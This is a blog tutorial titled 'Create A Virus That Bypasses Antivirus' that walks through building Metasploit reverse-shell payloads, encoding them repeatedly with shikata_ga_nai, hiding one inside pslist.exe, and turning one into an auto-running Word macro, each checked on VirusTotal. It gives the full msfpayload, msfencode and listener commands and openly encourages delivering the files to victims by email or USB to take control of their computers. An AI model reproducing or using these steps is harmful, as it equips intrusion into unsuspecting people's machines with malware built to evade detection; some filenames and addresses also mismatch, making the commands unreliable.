Latest News

<div style='background-color: none transparent;'><a href='http://news.rsspump.com/' title='rsspump'>news</a></div>
Monday, 11 February 2013

Create A Virus That Bypasses Antivirus

By Using Backtrack 5 And Metaspoilt.


All antivirus software is based upon the idea of malware signatures. What this means is that the antivirus software publishers simply keep track of what the malicious software looks like—when your Anti-virus software updates each day, it picks all new signatures. When it detects something that looks like one the recorded signatures, the software alert the user and quarantine's the malicious software.
So What are we Going to do ? We are simply going to change our Msf-Payload Signature.HOW ? Keep reading -

So What Do We Need ?

Backtrack 5
Capability to Sit For Long Duration
A LOT of brain and some patience.

Method 1:Metasploit Antivirus Bypass -

A skilled intruder who delivers a payload to your network in the form of an email message will want to make sure the payload can evade detection by antivirus software.90% Of the anti-virus programs depends upon the malware-signature database to recognize harmful files from normal files.We will now create a file that will (try to) slip through antiviruses. 

The Metasploit penetration testing framework provides a collection of tools you can use to test a network by attacking it the way an intruder would attack it. Metasploit’s "msfpayload" option helps you to create a standalone binary to serve as a malicious payload, and the msfencode option encodes the binary to confuse the antivirus scanners. Msfpayload allows you to generate shellcode, executables,etc.So Here We Go :

BUT Before we encode the payload to bypass antivirus detection's ,We Will create a stand-alone binary with msfpayload. Msfpayload creates a binary that launches a simple reverse shell, allowing a remote user to connect to the victim’s machine.We can narrow down the list of available payloads with the "msfpayload -l |grep windows" command, which gives a list of payloads that are specific to windows operating systems.

We will start by trying the Windows meterpreter reverse_tcp payload, see :

The windows/meterpreter/reverse_tcp payload will connect back to the attacker,as done in earlier tutorials,injecting the meterpreter server DLL via the reflective Dll injection payload.The O command-line argument shows all the available configurable options :

I create the payload with the the following command:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe

All you need to do now (if the victim pc is not equipped with anti-virus) is deliver the file,which is easy,send it bonded into another application or attached via a mail,or plug in the usb and click on it.If it has a program,read more-
In order to take advantage of the victim running the executable, We need to have a listener running on the attack machine. To listen for the victim running the executable, use the following command:

msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 E

This command will open up a listener on the local machine over port 4444 and, once the victim runs the executable, will open a meterpreter shell on the victim’s Windows box :



Now that the payload is working, the next step is to find a way to avoid antivirus detection. Since you can't have multiple antivirus running on your pc to check the file,we are going to take the help of website called Virus Total, This site has a collection of multiple antiviruses that will scan the file.Shitty Luck our file got deteced by most of the programs.

In hopes of achieving a better result, We will bring in msfencode and to try and get past the antivirus vendors. To DO THIS(hard,very hard), You will need to pipe the raw output of msfpayload as input to msfencode using the "shikata ga nai"(chinese) encoder. The encoder will output a a windows binary:

msfpayload windows/shell_reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/evil.exe

The results still show several hits with antivirus scanners, so we will take another approach. Some anti-virus  work on "signature-based technology", and the payload shell_reverse_tcp shows up right away, So we can try using the alternative "windows/shell/reverse_tcp" payload instead of windows/shell_reverse_tcp:

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -t exe -x /root/Desktop/pslist.exe -o /root/Desktop/pslist2.exe -e x86/shikata_ga_nai -c 10

We can also try additional steps to hide the payload. This time, take an executable from the Sysinternals site called pslist.exe and encode it 10 times with "shikata_ga_nai". The payload is combined with the sysinternal tool pslist.exe and renamed to pslist2.exe. Try it again On virus total site,Only detected by a few Anti-virus,YAYYY !


However, several common scanners did not identify the exploit. Use the msfcli command to set up a listener.
If the payload happens to slips through, it will open a shell on  your backtrack os with ADMIN privileges on the windows system.(now thats what i'm talking about)

VBS Script Infection : The Ultimate Trick.

As you can see from the previous attempts, although it is possible to slip past a specific scanner with a specific exploit, in general, anti-virus are very effective with their jobs (not like the government peeps). Another way to deliver a dangerous payload is using a Word document. Word documents are very commonly moved around by email and opened by many people. A Word doc is a great attack vector. Metasploit has some built-in methods for infecting Word documents with malicious Metasploit payloads.

Start by creating a VBScript payload:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 ENCODING=shikata_ga_nai X > evi1payload.exe

Now convert this executable to a VBScript using a script found in the Tools section of Metasploit. Just copy the evi1payload.exe (name of my file) to the Tools folder.

cp /opt/framework3/msf3/evilpayload.exe /opt/framework3/msf3/tools

Inside the Tools folder, you will find a script called "exe2vba.rb". Issue the following command to convert the .exe to a .vbs:

ruby exe2vba.rb evilpayload.exe evi1_payload.vbs

Now copy evil_payload.vbs to a Windows machine that has Microsoft Word installed, Open up evil_payload.vbs with Notepad, and open a blank Microsoft Word document. In Microsoft Word 2003, go to Tools-> Macros-> Visual Basic Editor, OR go to "View Macros" if you are using Microsoft Word 2010 or higher. Then copy the first portion of "evil_payload.vbs" from "Sub Auto_Open() to End Sub" and paste it into the Visual Basic Editor in either Microsoft Word 2003 or 2007 or Higher.See Below For Suggestions -


Then copy the portion from "PAYLOAD DATA" to the end into the body of the Word document.
Now We will verify that this word document can get past anti-viruses, upload it to Virus Total and see if it catches anything.

NONE FOR ME (suck it avg and bit-defender )

The Word doc slips past all the antivirus vendors.Now be Crafty and get a click on this script by the victim computer. Once you have delivered the Word document to your intended victim, make sure you have the Metasploit client listener up and running on the attack machine.

Got It ? Yes ? Now You have full control over that dude's computer,pissed sissy,he had no idea who he messed with this morning.

So how did you liked this tutorial ? Good,Excellent,Satisfying,Or could have been better ? Spot any spell mistakes by me ? or have a problem ? Just comment on the Section BELOW .Thats my dawg !



Create A Virus That Bypasses Antivirus
  • Blogger Comments
  • Facebook Comments

5 comments:

Post a Comment

Top